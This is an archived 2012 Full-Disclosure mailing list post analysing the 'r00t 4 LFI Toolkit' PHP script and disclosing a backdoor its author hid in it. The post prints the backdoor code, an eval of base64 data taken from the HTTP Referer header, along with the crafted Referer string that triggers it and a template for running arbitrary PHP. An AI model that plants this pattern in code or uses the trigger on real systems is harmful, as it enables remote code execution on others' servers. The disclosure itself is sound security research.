lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sun, 19 Feb 2012 12:01:47 -0500 From: InterN0T Advisories <advisories@...ern0t.net> To: <full-disclosure@...ts.grok.org.uk> Subject: Analysis of the "r00t 4 LFI Toolkit" Dear Full Disclosure readers, Today I saw Joe McCray among others, tweet about the (new) "r00t 4 LFI Toolkit", that according to its description: ------------------------------------------- This tool is a php script that assists in performing local file inclusion attacks. ------------------------------------------- >> Should be able to perform local file inclusion attacks. -:: Overview ::- After studying this tool for a brief 5 minutes, it was obvious that it was nowhere what I hoped it to be, as the tool only use one method, the "/proc/self/environ" vector (as seen on e.g., the intern0t forums and many other sites). The tool is therefore, not capable of performing "attacks", but only 1, single type of LFI attack. (Note that the 'S' has been removed.) The method this tool uses, is far from new and doesn't always work either, but it's a nice trick that e.g., SirGod wrote about on the intern0t forums in 2009. (This tool was released the 18th February 2012.) -:: Vulnerabilities ::- Further study of this tool reveals: - None of the output from the tool is sanitized, meaning the attacker using the script, can get XSS'd (and CSRF'd), if the target has changed e.g., the 'uname -a' command (which is relatively simple to do), to include (print) JavaScript instead. If this happens, the attacker may end up attacking himself, crashing or something third, depending on the type of XSS payload. - The most interesting part, is on line 92, where the "developer" (KedAns-Dz), has decided to >>backdoor<< the tool. -:: The Backdoor ::- Analysis of the backdoor: By sending a HTTP request, that includes a specially crafted referer, it is possible to execute PHP code: ------------------------------------------- Referer: a1=iz&a2=&a3=&a4=&a5=&a6=&a7=&a8=&a0=cGhwaW5mbygpOw== ------------------------------------------- This referer will make the script execute: phpinfo(); -:: Code Review ::- The code that enables the developer to use the script as a backdoor looks like the following: ------------------------------------------- parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' && count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+", join(array_slice($a,count($a)-3)))));echo '</star>';} ------------------------------------------- It certainly took a little bit of study to trigger, but in essence here's what it do: 1. Parse the HTTP Referer string into variable: $a ("Referer:" is not included.) 2. If the first array value (not key / arg), is a string named: iz 3. And if there's 9 (different) arrays, then 4. Print out the contents of.. This requires a bit more in-depth explanation: A) Evaluate the following as PHP code: B) Base64_decode the input: C) Replace " " (space) with "+" (plus), in case they occur. D) Use the last three array values from the HTTP referer. (You don't have to use all three, using the last will work fine.) To make it all a lot more simple: ------------------------------------------- Referer:Array1=iz&Array2=&Array3=&Array4=&Array5=&Array6=&Array7=&Array8=&Array0=[BASE64 Code that will be executed as PHP.] ------------------------------------------- Screenshot: http://i.imgur.com/PXcSX.png References: http://forum.intern0t.org/offensive-guides-information/4113-analysis-r00t-4-local-file-inclusion-toolkit.html http://forum.intern0t.org/general-hacking-discussions/1258-shell-via-local-file-inclusion-proc-self-environ-method-step-step.html http://packetstormsecurity.org/files/109940/ https://twitter.com/#!/j0emccray/status/170941195030233090 https://twitter.com/#!/EChavarro/status/170941489629761537 http://i.imgur.com/PXcSX.png Best regards, MaXe _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists